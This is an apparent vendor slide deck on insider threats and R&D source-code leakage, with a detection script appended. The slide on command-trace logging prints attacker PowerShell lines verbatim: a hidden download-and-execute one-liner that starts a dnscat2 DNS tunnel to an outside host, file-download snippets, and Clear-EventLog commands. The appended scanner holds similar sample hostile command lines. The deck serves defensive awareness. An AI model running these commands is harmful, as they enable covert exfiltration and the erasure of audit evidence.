
FineArt - Victor Chen Top 5 - PowerPoint PPT Presentation



  1. Confronting insider threats head-on: was the company victimized, or was the employee hacked? FineArt - Victor Chen

  2. Information security risks remain in the Top 5; data leakage > cyber-attacks
     The Global Risks Report 2019, 14th Edition: Top 5 Global Risks in Terms of Likelihood
     The Global Risks Landscape 2019 (axes: likelihood of risk, impact)
     http://www3.weforum.org/docs/WEF_Global_Risks_Report_2019.pdf

  3. The six areas of greatest interest to intelligence collectors
     Industry: Priority Sectors/Technologies
     • Energy/Alternative Energy: Advanced pressurized water reactor and high-temperature, gas-cooled nuclear power stations; Biofuels; Energy-efficient industries; Oil, gas, and coalbed methane development, including fracking; Smart grids; Solar energy technology; Wind turbines
     • Biotechnology: Advanced medical devices; Biomanufacturing and chemical manufacturing; Biomaterials; Biopharmaceuticals; Genetically modified organisms; Infectious disease treatment; New vaccines and drugs
     • Defense Technology: Aerospace & aeronautic system; Armaments; Marine system; Radar; Optics
     • Environmental Protection: Batteries; Energy-efficient appliances; Green building materials; Hybrid and electric cars; Waste management; Water/air pollution control
     • High-end Manufacturing: 3D Printing; Advanced robotics; Aircraft engines; Aviation maintenance and service sectors; Civilian aircraft; Electric motors; Foundational manufacturing equipment; High-end computer numerically controlled machines; High-performance composite materials; High-performance sealing materials; Integrated circuit manufacturing equipment and assembly technology; Space infrastructure and exploration technology; Synthetic rubber
     • Information and Communications Technology: Artificial intelligence; Big data analysis; Core electronics industries; E-commerce service; Foundational software products; High-end computer chips; Internet of things; Network equipment; Next-generation broadband wireless communications networks; Quantum computing and communications; Rare-earth materials
     Source: 2018 Foreign Economic Espionage in Cyberspace report, https://www.dni.gov/files/NCSC/documents/news/20180724-economic-espionage-pub.pdf

  4. The R&D department is the lifeblood of the enterprise, yet the hardest to manage

  5. The R&D engineer's working environment
     (Diagram labels: development board, RJ-45, IDE, Application, JTag, Source code, DB, SVN, HDL Tools, File, R&D, Simulator, Test, In-Circuit-Test, CAX / EDA tool, Layout Tools / PCB, Servers (Data / DB), Machine)

  6. SVS+SVT provide usage protection for R&D development tools
     • System Call: Print Image; System & DLL; Output File; Pipe Process (IPC)
     • Network API: Download / Upload; Tunnel / Cloud Application; Custom Protocol
     • CMD & Shell: CMD + PowerShell Script; IDE; Run Executable (EXE)
     • Hardware: Application Connect to Hardware Device; R&D Key Verification
     • Screen / Video Capture: 3rd Party Application; Screen Capture

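  7. SVS + SVT provide complete protection for R&D intellectual property
     R&D project development computer:
     • Allowed: SVN and development boards can be used normally (SVT)
     • Prohibited/Controlled: many kinds of operations can be restricted (printing, PrtScr, IPC)
     • Controlled: the number of characters pasted out can be limited (CTRL-C + CTRL-V)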

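  8. Demo 1: Visual Studio write-out protection, system-level defense
     • Files are protected as soon as Visual Studio writes and saves them
     • Visual Studio policy defense: Prohibited Call System
     • Defense and control can be tailored to the specialized tools of each industry, ensuring that intellectual assets are not leaked.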

  9. Risks in the command-line environment: how much do information security and audit teams know?

  10. IT security and audit teams should understand the applications used by R&D units
     • System Call: Print Image; System & DLL; Output File; Pipe Process (IPC)
     • Network API: Download / Upload; Tunnel / Cloud Application; Custom Protocol
     • CMD & Shell: CMD + PowerShell Script; IDE; Run Executable (EXE)
     • Hardware: Application Connect to Hardware Device; R&D Key Verification
     • Screen / Video Capture: 3rd Party Application; Screen Capture

  11. CMD and PowerShell environment analysis
     • OS default: Cmd.exe; Windows PowerShell; PowerShell ISE
     • SDK Command Function & AP { }: Call cmd.exe; Call PowerShell; Call exe
     • IDE Call Command
     • 3rd Party Application: ConEmu; PSReadLine; PSGet; Chocolatey; Babun (optional); Cmder; Git Bash by MinGW & MinTTY; WSL Ubuntu on Windows; Cygwin; Xshell; Console2; PowerShell ISE; PowerShell; Dell PowerGUI; Sapien PowerShell Studio; AWS Tools for PowerShell; Adam Driscoll's PowerShell; PowerShell Web Access; Master-powershell; VMware vSphere PowerCLI
     • Logging and controls: network behavior logging; cmd trace logging; process logging; software security control; SVS secure disk; SVT encrypted channel

  12. Small details reveal the importance of command trace logging
     PowerShell Dodge:
     • -WindowStyle hidden / -w hidden
     • -Exec Bypass
     • -Command / -c
     • -EncodedCommand / -e / -Enc
     • -Nop / -Noprofile
     • (New-Object System.Net.WebClient).DownloadFile()
     • (New-Object System.Net.WebClient).DownloadString()
     • Start-BitsTransfer
     Code Obfuscator:
     • Crunchcode (VBA)
     • ScriptCryptor (VBA, JavaScript)
     • CodeProtection (VBA)
     • Vbad (VBA)
     • Stunnix (C++, Perl, JavaScript, VBScript)
     • Scripts Encryptor (HTML, JavaScript/JScript, C/C++/MFC)
     • ISESteroids (PowerShell)
     3 ways to download files with PowerShell (Invoke-WebRequest; System.Net.WebClient; Start-BitsTransfer, asynchronous):
         $url = "http://pt.cyber-redteam.info/risktest/Obfuscator.txt"
         $output = "$PSScriptRoot\real.ps1"
         $start_time = Get-Date
         # Invoke-WebRequest
         # System.Net.WebClient
         $readteam = New-Object System.Net.WebClient
         $readteam.DownloadFile($url, $output)
         # Start-BitsTransfer
         Start-BitsTransfer -Source $url -Destination $output
         Write-Output "Time taken: $((Get-Date).Subtract($start_time).Seconds) second(s)"
     dnscat2.ps1, DNS tunnel with PowerShell:
         powershell.exe -nop -w hidden -c {IEX(New-Object System.Net.Webclient).DownloadString('https://pt.cyber-redteam.info/dnscat2-powershell/master/dnscat2.ps1'); Start-Dnscat2 -Domain dnsch.cirrus.[domain] -PreSharedSecret dnschcirrus}
     Clean all event logs:
         Clear-EventLog -LogName System
         Clear-EventLog -LogName Security
         Clear-EventLog -LogName Application
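One way to turn the command-trace indicators on this slide into a check over recorded process command lines. This is an added example, not part of the original deck; the indicator labels, the `scan` and `flagged` functions and the sample command lines are constructed for illustration.

```python
import re

def _p(pattern):
    return re.compile(pattern, re.IGNORECASE)

# Indicator names are this example's own labels (assumption); the behaviours
# come from the slide. PowerShell accepts unambiguous parameter prefixes, so
# the flag patterns also match short forms such as -w, -ep, -enc and -nop.
INDICATORS = [
    ("hidden_window",      _p(r"(?<!\S)-w[a-z]*\s+hidden\b")),
    ("exec_bypass",        _p(r"(?<!\S)-e(?:p|x[a-z]*)\s+bypass\b")),
    ("encoded_command",    _p(r"(?<!\S)-e(?:c|n[a-z]*)?\s+[a-z0-9+/=]{16,}")),
    ("no_profile",         _p(r"(?<!\S)-nop[a-z]*\b")),
    ("webclient_download", _p(r"net\.webclient\b.*?\.download(?:file|string)\s*\(")),
    ("bits_transfer",      _p(r"\bstart-bitstransfer\b")),
    ("invoke_webrequest",  _p(r"\binvoke-webrequest\b")),
    ("clear_eventlog",     _p(r"\bclear-eventlog\b")),
]

def scan(command_line):
    """Return the labels of every indicator present in one command line."""
    return [name for name, rx in INDICATORS if rx.search(command_line)]

def flagged(command_lines):
    """Map line index -> indicator labels, skipping lines with no hits."""
    hits = {}
    for i, line in enumerate(command_lines):
        labels = scan(line)
        if labels:
            hits[i] = labels
    return hits

# Constructed sample records (not from the deck). The host uses the reserved
# .invalid TLD and the encoded argument is a meaningless placeholder string.
SAMPLE = [
    "powershell.exe -nop -w hidden -c IEX(New-Object System.Net.WebClient)"
    ".DownloadString('http://files.example.invalid/a.ps1')",
    "powershell -ExecutionPolicy Bypass -EncodedCommand QUJDREVGR0hJSktMTU5PUA==",
    "powershell.exe Clear-EventLog -LogName Security",
    r"powershell.exe -File C:\build\compile.ps1 -Configuration Release",
]

if __name__ == "__main__":
    for idx, labels in flagged(SAMPLE).items():
        print(idx, labels, SAMPLE[idx])
```

The check only works if full command lines are being recorded in the first place, and the records should be forwarded off the host so that a local `Clear-EventLog` does not erase them.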
